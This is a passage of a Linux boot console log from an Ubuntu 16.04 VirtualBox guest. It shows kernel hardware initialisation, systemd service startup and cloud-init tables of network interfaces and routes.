_OSI(Processor Aggregator Device) +[ 3.216894] ACPI: Executed 1 blocks of module-level executable AML code +[ 3.224295] ACPI: Interpreter enabled +[ 3.229163] ACPI: (supports S0 S5) +[ 3.248492] ACPI: Using IOAPIC for interrupt routing +[ 3.251792] PCI: Using host bridge windows from ACPI; if necessary, use "pci=nocrs" and report a bug +[ 3.278616] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff]) +[ 3.290426] acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI] +[ 3.291853] acpi PNP0A03:00: _OSC: not requesting OS control; OS requires [ExtendedConfig ASPM ClockPM MSI] +[ 3.299935] acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge. +[ 3.308275] PCI host bridge to bus 0000:00 +[ 3.317033] pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7 window] +[ 3.323789] pci_bus 0000:00: root bus resource [io 0x0d00-0xffff window] +[ 3.336766] pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window] +[ 3.346474] pci_bus 0000:00: root bus resource [mem 0x40000000-0xfdffffff window] +[ 3.348226] pci_bus 0000:00: root bus resource [bus 00-ff] +[ 3.363411] pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7] +[ 3.372521] pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6] +[ 3.385247] pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177] +[ 3.387555] pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376] +[ 3.423139] pci 0000:00:07.0: quirk: [io 0x4000-0x403f] claimed by PIIX4 ACPI +[ 3.434121] pci 0000:00:07.0: quirk: [io 0x4100-0x410f] claimed by PIIX4 SMB +[ 3.477489] ACPI: PCI Interrupt Link [LNKA] (IRQs 5 9 10 *11) +[ 3.479892] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 9 *10 11) +[ 3.483040] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 *9 10 11) +[ 3.495152] ACPI: PCI Interrupt Link [LNKD] (IRQs 5 9 10 *11) +[ 3.508169] ACPI: Enabled 2 GPEs in block 00 to 07 +[ 3.512296] vgaarb: setting as boot device: PCI:0000:00:02.0 +[ 3.513571] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none +[ 3.521248] vgaarb: loaded +[ 3.523468] vgaarb: bridge control possible 0000:00:02.0 +[ 3.532718] SCSI subsystem initialized +[ 3.535460] ACPI: bus type USB registered +[ 3.543046] usbcore: registered new interface driver usbfs +[ 3.546496] usbcore: registered new interface driver hub +[ 3.547841] usbcore: registered new device driver usb +[ 3.569351] PCI: Using ACPI for IRQ routing +[ 3.570520] NetLabel: Initializing +[ 3.573419] NetLabel: domain hash size = 128 +[ 3.576596] NetLabel: protocols = UNLABELED CIPSOv4 +[ 3.579115] NetLabel: unlabeled traffic allowed by default +[ 3.585597] amd_nb: Cannot enumerate AMD northbridges +[ 3.587158] clocksource: Switched to clocksource kvm-clock +[ 3.609154] AppArmor: AppArmor Filesystem Enabled +[ 3.610274] pnp: PnP ACPI init +[ 3.612066] pnp: PnP ACPI: found 3 devices +[ 3.1835] clocksource: acpi_pm: mask: 0xffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns +[ 3.705662] NET: Registered protocol family 2 + +[ 3.706980] TCP established hash table entries: 8192 (order: 4, 65536 bytes) +[ 3.737219] TCP bind hash table entries: 8192 (order: 5, 131072 bytes) +[ 3.738648] TCP: Hash tables configured (established 8192 bind 8192) +[ 3.755003] UDP hash table entries: 512 (order: 2, 16384 bytes) +[ .762886] UDP-Lite hash table entries: 512 (order: 2, 16384 bytes) +[ 3.87069] NET: Registered protocol family 1 +[ 3.914774] pci 0000:00:00.0: Limiting direct PCI/PCI transfers +[ 3.921811] pci 0000:00:0.0: Activating ISA DMA hang workarounds +[ 3.971080] Unpacking initramfs... + +[ 4.648526] Freeing initrd memory: 14880K +[ 4.652483] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x1fd3b6211b4, max_idle_ns: 440795230313 ns +[ 4.667839] platform rtc_cmos: registered platform RTC device (no PNP device found) +[ 4.671408] Scanning for low memory corruption every 60 seconds +[ 4.683220] audit: initializing netlink subsys (disabled) +[ 4.685539] audit: type=2000 audit(1611614297.807:1): initialized +[ 4.688483] Initialise system trusted keyring +[ 4.692508] HugeTLB registered 2 MB page size, pre-allocated 0 pages +[ 4.696642] zbud: loaded +[ 4.699806] VFS: Disk quotas dquot_6.6.0 +[ 4.701484] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes) +[ 4.704888] squashfs: version 4.0 (2009/01/31) Phillip Lougher +[ 4.709143] fuse init (API version 7.23) +[ 4.716792] Key type big_key registered +[ 4.718704] Allocating IMA MOK and blacklist keyrings. +[ 4.722690] Key type asymmetric registered +[ 4.724451] Asymmetric key parser 'x509' registered +[ 4.728098] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 249) +[ 4.737750] io scheduler noop registered +[ 4.739774] io scheduler deadline registered (default) +[ 4.741687] io scheduler cfq registered +[ 4.746021] pci_hotplug: PCI Hot Plug PCI Core version: 0.5 +[ 4.750754] pciehp: PCI Express Hot Plug Controller Driver version: 0.4 +[ 4.755449] ACPI: AC Adapter [AC] (on-line) +[ 4.758334] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0 +[ 4.763953] ACPI: Power Button [PWRF] +[ 4.769120] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input1 +[ 4.774267] ACPI: Sleep Button [SLPF] +[ 4.788163] ACPI: Battery Slot [BAT0] (battery present) +[ 4.792629] GHES: HEST is not enabled! +[ 4.799136] Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled +[ 4.829188] 00:02: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A +[ .838830] Linux agpgart interface v0.103 + +[ 4.997005] loop: module loaded +[ 5.002438] scsi host0: ata_piix +[ 5.009428] scsi host1: ata_piix +[ 5.010418] ata1: PATA max UDMA/33 cmd 0x1f0 ctl 0x3f6 bmdma 0xd000 irq 14 +[ 5.015681] ata2: PATA max UDMA/33 cmd 0x170 ctl 0x376 bmdma 0xd008 irq 15 +[ 5.025124] libphy: Fixed MDIO Bus: probed +[ 5.037041] tun: Universal TUN/TAP device driver, 1.6 +[ 5.042524] tun: (C) 1999-2004 Max Krasnyansky +[ 5.047130] PPP generic driver version 2.4.2 +[ 5.055148] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver +[ 5.057113] ehci-pci: EHCI PCI platform driver +[ 5.060875] ehci-platform: EHCI generic platform driver +[ 5.064221] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver +[ 5.069352] ohci-pci: OHCI PCI platform driver +[ 5.072265] ohci-platform: OHCI generic platform driver +[ 5.077051] uhci_hcd: USB Universal Host Controller Interface driver +[ 5.082575] i8042: PNP: PS/2 Controller [PNP0303:PS2K,PNP0f03:PS2M] at 0x60,0x64 irq 1,12 +[ 5.092808] serio: i8042 KBD port at 0x60,0x64 irq 1 +[ 5.106441] serio: i8042 AUX port at 0x60,0x64 irq 12 +[ 5.113218] mousedev: PS/2 mouse device common for all mice +[ 5.119953] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input2 +[ 5.127395] rtc_cmos rtc_cmos: rtc core: registered rtc_cmos as rtc0 +[ 5.127452] rtc_cmos rtc_cmos: alarms up to one day, 114 bytes nvram +[ 5.127460] i2c /dev entries driver +[ 5.127514] device-mapper: uevent: version 1.0.3 +[ 5.127568] device-mapper: ioctl: 4.34.0-ioctl (2015-10-28) initialised: dm-devel@redhat.com +[ 5.127584] ledtrig-cpu: registered to indicate activity on CPUs +[ 5.131420] NET: Registered protocol family 10 +[ 5.131613] NET: Registered protocol family 17 +[ 5.131626] Key type dns_resolver registered +[ 5.131865] registered taskstats version 1 +[ 5.131881] Loading compiled-in X.509 certificates +[ 5.132531] Loaded X.509 cert 'Build time autogenerated kernel key: b89e9ea735e1dbde81c7786f041ecf1d53e71c2e' +[ 5.132547] zswap: loaded using pool lzo/zbud +[ 5.134189] Key type trusted registered +[ 5.137564] Key type encrypted registered +[ 5.137570] AppArmor: AppArmor sha1 policy hashing enabled +[ 5.137573] ima: No TPM chip found, activating TPM-bypass! +[ 5.137581] ima: Allocated hash algorithm: sha1 +[ 5.137594] evm: HMAC attrs: 0x1 +[ 5.138019] Magic number: 5:763:654 +[ 5.145195] rtc_cmos rtc_cmos: setting system clock to 2021-01-25 22:38:15 UTC (1611614295) +[ 5.145356] BIOS EDD facility v0.16 2004-Jun-25, 0 devices found +[ 5.145356] EDD information not available. +[ 5.279204] Freeing unused kernel memory: 1492K +[ 5.299153] Write protecting the kernel read-only data: 14336k +[ 5.300762] Freeing unused kernel memory: 1592K +[ 5.310111] Freeing unused kernel memory: 56K +Loading, please wait... +starting version 229 +[ 5.340139] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 5.342381] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 5.342418] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 5.364180] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 5.364237] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 5.364394] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 5.364457] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 5.364520] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 5.364582] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 5.364645] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 5.892975] e1000: Intel(R) PRO/1000 Network Driver - version 7.3.21-k8-NAPI +[ 5.902549] e1000: Copyright (c) 1999-2006 Intel Corporation. +[ 5.905792] Fusion MPT base driver 3.04.20 +[ 5.907286] Copyright (c) 1999-2008 LSI Corporation +[ 5.913063] Fusion MPT SPI Host driver 3.04.20 +[ 5.959583] AVX2 version of gcm_enc/dec engaged. +[ 5.962012] AES CTR mode by8 optimization enabled +[ 6.134209] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input4 +[ 6.411492] e1000 0000:00:03.0 eth0: (PCI:33MHz:32-bit) 02:83:3c:85:18:ff +[ 6.413799] e1000 0000:00:03.0 eth0: Intel(R) PRO/1000 Network Connection +[ 6.418554] mptbase: ioc0: Initiating bringup +[ 6.770410] ioc0: LSI53C1030 A0: Capabilities={Initiator} +[ 7.686431] scsi host2: ioc0: LSI53C1030 A0, FwRev=00000000h, Ports=1, MaxQ=256, IRQ=20 +[ 8.380886] scsi 2:0:0:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 +[ 8.434252] scsi target2:0:0: Beginning Domain Validation +[ 8.464029] scsi target2:0:0: Domain Validation skipping write tests +[ 8.465220] scsi target2:0:0: Ending Domain Validation +[ 8.469614] scsi target2:0:0: asynchronous +[ 8.475155] scsi 2:0:1:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 +[ 8.476680] scsi target2:0:1: Beginning Domain Validation +[ 8.487346] scsi target2:0:1: Domain Validation skipping write tests +[ 8.488319] scsi target2:0:1: Ending Domain Validation +[ 8.489245] scsi target2:0:1: asynchronous +[ 8.508725] sd 2:0:0:0: Attached scsi generic sg0 type 0 +[ 8.515925] sd 2:0:1:0: Attached scsi generic sg1 type 0 +[ 8.517155] sd 2:0:0:0: [sda] 20971520 512-byte logical blocks: (10.7 GB/10.0 GiB) +[ 8.535921] sd 2:0:1:0: [sdb] 20480 512-byte logical blocks: (10.5 MB/10.0 MiB) +[ 8.537912] sd 2:0:1:0: [sdb] Write Protect is off +[ 8.540174] sd 2:0:0:0: [sda] Write Protect is off +[ 8.552986] sd 2:0:1:0: [sdb] Incomplete mode parameter data +[ 8.559195] sd 2:0:1:0: [sdb] Assuming drive cache: write through +[ 8.560626] sd 2:0:0:0: [sda] Incomplete mode parameter data +[ 8.567135] sd 2:0:0:0: [sda] Assuming drive cache: write through +[ 8.586569] sda: sda1 +[ 8.596111] sd 2:0:1:0: [sdb] Attached SCSI disk +[ 8.597620] sd 2:0:0:0: [sda] Attached SCSI disk +[ 8.798509] e1000 0000:00:08.0 eth1: (PCI:33MHz:32-bit) 08:00:27:e7:3f:6e +[ 8.806666] e1000 0000:00:08.0 eth1: Intel(R) PRO/1000 Network Connection +[ 9.182067] e1000 0000:00:09.0 eth2: (PCI:33MHz:32-bit) 08:00:27:d2:86:ba +[ 9.240559] e1000 0000:00:09.0 eth2: Intel(R) PRO/1000 Network Connection +[ 9.897233] e1000 0000:00:0a.0 eth3: (PCI:33MHz:32-bit) 08:00:27:b2:94:cd +[ 9.952689] e1000 0000:00:0a.0 eth3: Intel(R) PRO/1000 Network Connection +[ 9.957703] e1000 0000:00:03.0 enp0s3: renamed from eth0 +[ 9.983338] e1000 0000:00:08.0 enp0s8: renamed from eth1 +[ 10.013011] e1000 0000:00:09.0 enp0s9: renamed from eth2 +[ 10.023518] e1000 0000:00:0a.0 enp0s10: renamed from eth3 +Begin: Loading essential drivers ... [ 11.876086] md: linear personality registered for level -1 +[ 11.900745] md: multipath personality registered for level -4 +[ 11.989958] md: raid0 personality registered for level 0 +[ 12.027735] md: raid1 personality registered for level 1 +[ 12.139384] raid6: sse2x1 gen() 5524 MB/s +[ 12.207682] raid6: sse2x1 xor() 4575 MB/s +[ 12.283467] raid6: sse2x2 gen() 9003 MB/s +[ 12.352285] raid6: sse2x2 xor() 4327 MB/s +[ 12.436243] raid6: sse2x4 gen() 3815 MB/s +[ 12.518468] raid6: sse2x4 xor() 2724 MB/s +[ 12.602924] raid6: avx2x1 gen() 4400 MB/s +[ 12.712770] raid6: avx2x2 gen() 3708 MB/s +[ 12.789713] raid6: avx2x4 gen() 6461 MB/s +[ 12.803871] raid6: using algorithm sse2x2 gen() 9003 MB/s +[ 12.816004] raid6: .... xor() 4327 MB/s, rmw enabled +[ 12.846995] raid6: using avx2x2 recovery algorithm +[ 12.875217] xor: automatically using best checksumming function: +[ 12.962535] avx : 8341.000 MB/sec +[ 12.987770] async_tx: api initialized (async) +[ 13.096688] md: raid6 personality registered for level 6 +[ 13.112750] md: raid5 personality registered for level 5 +[ 13.133942] md: raid4 personality registered for level 4 +[ 13.228671] md: raid10 personality registered for level 10 +done. +Begin: Running /scripts/init-premount ... done. +Begin: Mounting root file system ... Begin: Running /scripts/local-top ... done. +Begin: Running /scripts/local-premount ... [ 13.408295] Btrfs loaded +Scanning for Btrfs filesystems +done. +Warning: fsck not present, so skipping root file system +[ 13.576087] EXT4-fs (sda1): INFO: recovery required on readonly filesystem +[ 13.581633] EXT4-fs (sda1): write access will be enabled during recovery +[ 13.615273] EXT4-fs (sda1): recovery complete +[ 13.622746] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null) +done. +Begin: Running /scripts/local-bottom ... done. +Begin: Running /scripts/init-bottom ... done. +[ 13.953558] systemd[1]: systemd 229 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ -LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN) +[ 13.975146] systemd[1]: Detected virtualization oracle. +[ 13.982654] systemd[1]: Detected architecture x86-64. + +Welcome to Ubuntu 16.04.7 LTS! + +[ 14.002048] systemd[1]: Set hostname to . +[ 14.117590] hrtimer: interrupt took 20866570 ns +[ 14.277484] random: nonblocking pool is initialized +[ 14.386343] systemd[1]: Created slice System Slice. +[ OK ] Created slice System Slice. +[ 14.475644] systemd[1]: Started Forward Password Requests to Wall Directory Watch. +[ OK ] Started Forward Password Requests to Wall Directory Watch. +[ 14.507362] systemd[1]: Started Trigger resolvconf update for networkd DNS. +[ OK ] Started Trigger resolvconf update for networkd DNS. +[ 14.523471] systemd[1]: Listening on Journal Socket (/dev/log). +[ OK ] Listening on Journal Socket (/dev/log). +[ 14.537790] systemd[1]: Reached target Encrypted Volumes. +[ OK ] Reached target Encrypted Volumes. +[ 14.587335] systemd[1]: Listening on LVM2 metadata daemon socket. +[ OK ] Listening on LVM2 metadata daemon socket. +[ 14.606569] systemd[1]: Listening on Device-mapper event daemon FIFOs. +[ OK ] Listening on Device-mapper event daemon FIFOs. +[ 14.634688] systemd[1]: Listening on Journal Audit Socket. +[ OK ] Listening on Journal Audit Socket. +[ 14.722344] systemd[1]: Reached target User and Group Name Lookups. +[ OK ] Reached target User and Group Name Lookups. +[ 14.734875] systemd[1]: Created slice system-serial\x2dgetty.slice. +[ OK ] Created slice system-serial\x2dgetty.slice. +[ 14.753275] systemd[1]: Listening on /dev/initctl Compatibility Named Pipe. +[ OK ] Listening on /dev/initctl Compatibility Named Pipe. +[ 14.770012] systemd[1]: Reached target Swap. +[ OK ] Reached target Swap. +[ 14.790145] systemd[1]: Listening on udev Control Socket. +[ OK ] Listening on udev Control Socket. +[ 14.794736] systemd[1]: Set up automount Arbitrary Executable File Formats File System Automount Point. +[ OK ] Set up automount Arbitrary Executab...ats File System Automount Point. +[ 14.826668] systemd[1]: Created slice User and Session Slice. +[ OK ] Created slice User and Session Slice. +[ 14.838920] systemd[1]: Reached target Slices. +[ OK ] Reached target Slices. +[ 14.844285] systemd[1]: Listening on Syslog Socket. +[ OK ] Listening on Syslog Socket. +[ 14.868641] systemd[1]: Listening on Journal Socket. +[ OK ] Listening on Journal Socket. +[ 14.903224] systemd[1]: Mounting Huge Pages File System... + Mounting Huge Pages File System... +[ 14.927380] systemd[1]: Mounting POSIX Message Queue File System... + Mounting POSIX Message Queue File System... +[ 14.966424] systemd[1]: Starting Uncomplicated firewall... + Starting Uncomplicated firewall... +[ 15.001536] systemd[1]: Starting Monitoring of LVM2 mirrors, snapshots etc. using dmeventd or progress polling... + Starting Monitoring of LVM2 mirrors... dmeventd or progress polling... +[ 15.038910] systemd[1]: Starting Set console keymap... + Starting Set console keymap... +[ 15.095349] systemd[1]: Starting Load Kernel Modules... + Starting Load Kernel Modules... +[ 15.123932] systemd[1]: Starting Nameserver information manager... + Starting Nameserver information manager... +[ 15.151905] systemd[1]: Mounting Debug File System... + Mounting Debug File System... +[ 15.174694] systemd[1]: Reached target System Time Synchronized. +[ OK ] Reached target System Time Synchronized. +[ 15.242421] Loading iSCSI transport class v2.0-870. +[ 15.257178] systemd[1]: Starting Remount Root and Kernel File Systems... + Starting Remount Root and Kernel File Systems...[ 15.264304] EXT4-fs (sda1): re-mounted. Opts: (null) + +[ 15.275108] systemd[1]: Listening on udev Kernel Socket. +[ OK ] Listening on udev Kernel Socket. +[ 15.285286] systemd[1]: Starting Journal Service... +[ 15.296665] iscsi: registered transport (tcp) + Starting Journal Service... +[ 15.304596] systemd[1]: Listening on LVM2 poll daemon socket. +[ OK ] Listening on LVM2 poll daemon socket. +[ 15.328542] systemd[1]: Starting Create list of required static device nodes for the current kernel... + Starting Create list of required st... nodes for the current kernel... +[ 15.360027] systemd[1]: Mounted Debug File System. +[ OK ] Mounted Debug File System. +[ 15.366053] systemd[1]: Mounted Huge Pages File System. +[ OK ] Mounted Huge Pages File System. +[ 15.395624] systemd[1]: Mounted POSIX Message Queue File System. +[ OK ] Mounted POSIX Message Queue File System. +[ 15.416198] systemd[1]: Started Uncomplicated firewall. +[ OK ] Started Uncomplicated firewall. +[ 15.445833] systemd[1]: Started Set console keymap. +[ OK ] Started Set console keymap. +[ 15.481822] systemd[1]: Started Remount Root and Kernel File Systems. +[ OK ] Started Remount Root and Kernel File Systems. +[ 15.503935] systemd[1]: Started Create list of required static device nodes for the current kernel. +[ OK ] Started Create list of required sta...ce nodes for the current kernel. +[ 15.536187] systemd[1]: Started Nameserver information manager. +[ OK ] Started Nameserver information manager. +[ 15.543431] systemd[1]: Started Journal Service. +[ OK ] Started Journal Service. +[ OK [ 15.602027] iscsi: registered transport (iser) +] Started LVM2 metadata daemon. + Starting Create Static Device Nodes in /dev... + Starting Load/Save Random Seed... + Starting udev Coldplug all Devices... + Starting Flush Journal to Persistent Storage... +[ OK ] Started Load Kernel Modules. +[ OK ] Started Load/Save Random Seed. + Starting Apply Kernel Variables... + Mounting FUSE Control File System... +[ OK ] Mounted FUSE Control File System. +[ OK ] Started Create Static Device Nodes in /dev. +[ OK ] Started Apply Kernel Variables. + Starting udev Kernel Device Manager... +[ OK ] Started Flush Journal to Persistent Storage. +[ OK ] Started Monitoring of LVM2 mirrors,...ng dmeventd or progress polling. +[ OK ] Started udev Coldplug all Devices. +[ OK ] Reached target Local File Systems (Pre). +[ OK ] Reached target Local File Systems. + Starting Create Volatile Files and Directories... + Starting LSB: AppArmor initialization... + Starting Tell Plymouth To Write Out Runtime Data... + Starting Set console font and keymap... + Starting Initial cloud-init job (pre-networking)... +[ OK ] Started udev Kernel Device Manager. +[ OK ] Started Tell Plymouth To Write Out Runtime Data. +[ OK ] Started Create Volatile Files and Directories. + Starting Update UTMP about System Boot/Shutdown... +[ OK ] Started Dispatch Password Requests to Console Directory Watch. +[ OK ] Started Update UTMP about System Boot/Shutdown. +[ OK ] Started LSB: AppArmor initialization. + Starting Load AppArmor profiles managed internally by snapd... +[ OK ] Started Load AppArmor profiles managed internally by snapd. +[ OK ] Found device /dev/ttyS0. +[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). +[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). +[ OK ] Listening on Load/Save RF Kill Switch Status /dev/rfkill Watch. +[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). +[ OK ] Started Set console font and keymap. +[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). +[ OK ] Created slice system-getty.slice. +[ 18.329629] cloud-init[489]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init-local' at Mon, 25 Jan 2021 22:38:30 +0000. Up 16.92 seconds. +[ OK ] Started Initial cloud-init job (pre-networking). +[ OK ] Reached target Network (Pre). + Starting Raise network interfaces... +[ OK ] Started ifup for enp0s9. +[ OK ] Started ifup for enp0s10. +[ OK ] Started ifup for enp0s3. +[ OK ] Started ifup for enp0s8. +[ OK ] Started Raise network interfaces. +[ OK ] Reached target Network. + Starting Initial cloud-init job (metadata service crawler)... +[ 20.783277] cloud-init[1306]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init' at Mon, 25 Jan 2021 22:38:33 +0000. Up 20.09 seconds. +[ OK [ 20.913574] cloud-init[1306]: ci-info: +++++++++++++++++++++++++++++++++++++++Net device info+++++++++++++++++++++++++++++++++++++++] Started Initial cloud-init job (metadata service crawler). +[ OK ] Reached target Cloud-config availability. +[ OK ] Reached target System Initialization. + +[ 20.930668] cloud-init[1306]: ci-info: +---------+------+-----------------------------+---------------+--------+-------------------+ +[ 21.229438] cloud-init[1306]: ci-info: | Device | Up | Address | Mask | Scope | Hw-Address | +[ OK ] Started ACPI Events Check. +[ 21.287888] cloud-init[1306]: ci-info: +---------+------+-----------------------------+---------------+--------+-------------------+ +[ 21.299080] cloud-init[1306]: [ OK ] Reached target Paths. +ci-info: | enp0s10 | True | 192.168.102.2 | 255.255.255.0 | global | 08:00:27:b2:94:cd | +[ OK ] Started Daily apt download activities. +[ 21.320858] cloud-init[1306]: ci-info: | enp0s10 | True | fe80::a00:27ff:feb2:94cd/64 | . | link | 08:00:27:b2:94:cd | +[ 21.339052] cloud-init[1306]: ci-info: | enp0s3 | True | 10.0.2.15 | 255.255.255.0 | global | 02:83:3c:85:18:ff | + Starting LXD - unix socket. +[ 21.346661] cloud-init[1306]: ci-info: | enp0s3 | True | fe80::83:3cff:fe85:18ff/64 | . | link | 02:83:3c:85:18:ff | +[ 21.346992] cloud-init[1306]: ci-info: | enp0s8 | True | 192.168.2.254 | 255.255.255.0 | global | 08:00:27:e7:3f:6e | +[ 21.347056] cloud-init[1306]: ci-info: | enp0s8 | True | fe80::a00:27ff:fee7:3f6e/64 | . | link | 08:00:27:e7:3f:6e | +[ 21.347115] cloud-init[1306]: ci-info: | enp0s9 | True | 192.168.100.2 | 255.255.255.0 | global | 08:00:27:d2:86:ba | +[ 21.347171] cloud-init[1306]: ci-info: | enp0s9 | True | fe80::a00:27ff:fed2:86ba/64 | . | link | 08:00:27:d2:86:ba | +[ 21.347235] cloud-init[1306]: ci-info: | lo | True | 127.0.0.1 | 255.0.0.0 | host | . | +[ 21.347289] cloud-init[1306]: ci-info: | lo | True | ::1/128 | . | host | . | +[ 21.347337] cloud-init[1306]: ci-info: +---------+------+-----------------------------+---------------+--------+-------------------+ +[ 21.347388] cloud-init[1306]: ci-info: ++++++++++++++++++++++++++++Route IPv4 info+++++++++++++++++++++++++++++ +[ 21.347450] cloud-init[1306]: ci-info: +-------+---------------+----------+---------------+-----------+-------+ +[ 21.347518] cloud-init[1306]: ci-info: | Route | Destination | Gateway | Genmask | Interface | Flags | +[ 21.347576] cloud-init[1306]: ci-info: +-------+---------------+----------+---------------+-----------+-------+ +[ 21.347775] cloud-init[1306]: ci-info: | 0 | 0.0.0.0 | 10.0.2.2 | 0.0.0.0 | enp0s3 | UG | +[ 21.347844] cloud-init[1306]: ci-info: | 1 | 10.0.2.0 | 0.0.0.0 | 255.255.255.0 | enp0s3 | U | +[ 21.347906] cloud-init[1306]: ci-info: | 2 | 192.168.2.0 | 0.0.0.0 | 255.255.255.0 | enp0s8 | U | +[ 21.348031] cloud-init[ OK ] Started Daily apt upgrade and clean activities. + Starting Socket activation for snappy daemon. +[ OK ] Started Daily Cleanup of Temporary Directories. +[ OK ] Listening on ACPID Listen Socket. +[ OK ] Started Message of the Day. +[ OK ] Reached target Timers. +[ OK ] Listening on D-Bus System Message Bus Socket. +[ OK ] Listening on UUID daemon activation socket. +[ OK ] Reached target Network is Online. +[1306]: ci-info: | 3 | 192.168.100.0 | 0.0.0.0 | 255.255.255.0 | enp0s9 | U | +[ 21.917580] cloud-init[1306]: ci-info: | 4 | 192.168.102.0 | 0.0.0.0 | 255.255.255.0 | enp0s10 | U | + Starting iSCSI initiator daemon (iscsid)... +[ OK ] Listening on LXD - unix socket. +[ 21.961999] cloud-init[1306]: ci-info: +-------+---------------+----------+---------------+-----------+-------+ +[ 22.129035] cloud-init[1306]: ci-info: +++++++++++++++++++Route IPv6 info+++++++++++++++++++ +[ OK ] Listening on Socket activation for snappy daemon. +[ 22.191402] cloud-init[1306]: ci-info: +-------+-------------+---------+-----------+-------+ +[ 22.284476] cloud-init[1306]: ci-info: | Route | Destination | Gateway | Interface | Flags | +[ 22.290177] cloud-init[1306]: ci-info: +-------+-------------+---------+-----------+-------+ +[ 22.290231] cloud-init[1306]: ci-info: | 0 | fe80::/64 | :: | enp0s9 | U | +[ 22.290277] cloud-init[1306]: ci-info: | 1 | fe80::/64 | :: | enp0s10 | U | +[ 22.290314] cloud-init[1306]: ci-info: | 2 | fe80::/64 | :: | enp0s8 | U | +[ 22.290350] cloud-init[1306]: ci-info: | 3 | fe80::/64 | :: | enp0s3 | U | +[ 22.290415] cloud-init[1306]: ci-info: | 9 | ff00::/8 | :: | enp0s9 | U | +[ OK ] Reached target Sockets. +[ OK ] Reached target Basic System. +[ 22.290864] cloud-init[1306]: ci-info: | 10 | ff00::/8 | :: | enp0s10 | U | +[ 22.665538] [cloud-init OK [1306]: ] ci-info: | 11 | ff00::/8 | :: | enp0s8 | U |Started FUSE filesystem for LXC. + +[ 22.666029] cloud-init[1306]: ci-info: | 12 | ff00::/8 | :: | enp0s3 | U | +[ 22.838646] cloud-init[1306]: ci-info: +-------+-------------+---------+-----------+-------+ + Starting LSB: MD monitoring daemon... +[ OK ] Started Deferred execution scheduler. + Starting System Logging Service... + Starting Accounts Service... +[ OK ] Started ACPI event daemon. + Starting LSB: Record successful boot for GRUB... + Starting Login Service... + Starting /etc/rc.local Compatibility... +[ OK ] Started Regular background program processing daemon. + Starting Snap Daemon... + Starting OpenBSD Secure Shell server... +[ OK ] Started D-Bus System Message Bus. + Starting Virtualbox guest utils... + Starting LXD - container startup/shutdown... +[ OK ] Started System Logging Service. +[ OK ] Started iSCSI initiator daemon (iscsid). +[ OK ] Started /etc/rc.local Compatibility. +[ OK ] Started OpenBSD Secure Shell server. +[ OK ] Started Login Service. +[ OK ] Started Unattended Upgrades Shutdown. + Starting Authenticate and Authorize Users to Run Privileged Tasks... + Starting Login to default iSCSI targets... +[ OK ] Started LSB: MD monitoring daemon. +[ OK ] Started LSB: Record successful boot for GRUB. +[ OK ] Started Authenticate and Authorize Users to Run Privileged Tasks. +[ OK ] Started Virtualbox guest utils. +[ OK ] Started Accounts Service. +[ OK ] Started LXD - container startup/shutdown. +[ OK ] Started Snap Daemon. +[ OK ] Started Login to default iSCSI targets. +[ OK ] Reached target Remote File Systems (Pre). +[ OK ] Reached target Remote File Systems. + Starting LSB: start and stop the Quagga routing suite... + Starting Permit User Sessions... + Starting LSB: automatic crash report generation... + Starting LSB: Set the CPU Frequency Scaling governor to "ondemand"... + Starting LSB: daemon to balance interrupts for SMP systems... + Starting Wait until snapd is fully seeded... +[ OK ] Started Permit User Sessions. + Starting Terminate Plymouth Boot Screen... + Starting Hold until boot process finishes up... +[ OK ] Started Wait until snapd is fully seeded. +[ OK ] Started Terminate Plymouth Boot Screen. +[ OK ] Started Hold until boot process finishes up. +[ OK ] Started Getty on tty1. + Starting Set console 